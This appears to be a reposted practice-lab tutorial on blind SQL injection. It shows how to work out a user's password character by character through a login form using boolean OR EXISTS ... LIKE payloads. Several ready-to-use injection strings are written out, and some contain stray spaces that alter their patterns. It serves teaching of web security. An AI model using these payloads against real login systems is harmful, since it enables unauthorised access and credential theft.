Work Space
Guess jake's password
From the previous page you should have gained
access as jake however you still do not know jake's
password.
You can now find this out using a little trial
and error. Before you continue try taking a guessat
jake's password by entering jake as user name and
your best guess at his password. Work out jake's password You can now get the system to answer questions about the password table. It will only ever answer yes (and let you in) or no (by refusing entry).
Your questions must take the form of a valid SQL query. In each case use a xx for the user name and the text shown as password. You can ask questions such as:
Does jake's password have a w in it?
' OR EXISTS(SELECT * FROM users WHERE
name='jake' AND password LIKE '% w%') AND ''='
Does jake's password start with w?
' OR EXISTS(SELECT * FROM users WHERE
name='jake' AND password LIKE ' w%') AND ''='
Does jake's password have an w followed by d?
' OR EXISTS(SELECT * FROM users WHERE
name='jake' AND password LIKE '% w%d%') AND ''='
Is the fourth letter of jake's password w?
' OR EXISTS(SELECT * FROM users WHERE
name='jake' AND password LIKE '___ w%') AND ''='
This works because the LIKE command uses % and _ as wildcards. The % wildcard matches any string, the _ wildcard matches a single character.
next page Find username using sql injection
via oneofthebest All articles about hacking have only an educational goal and we are not responsible
0 commentaires:
Enregistrer un commentaire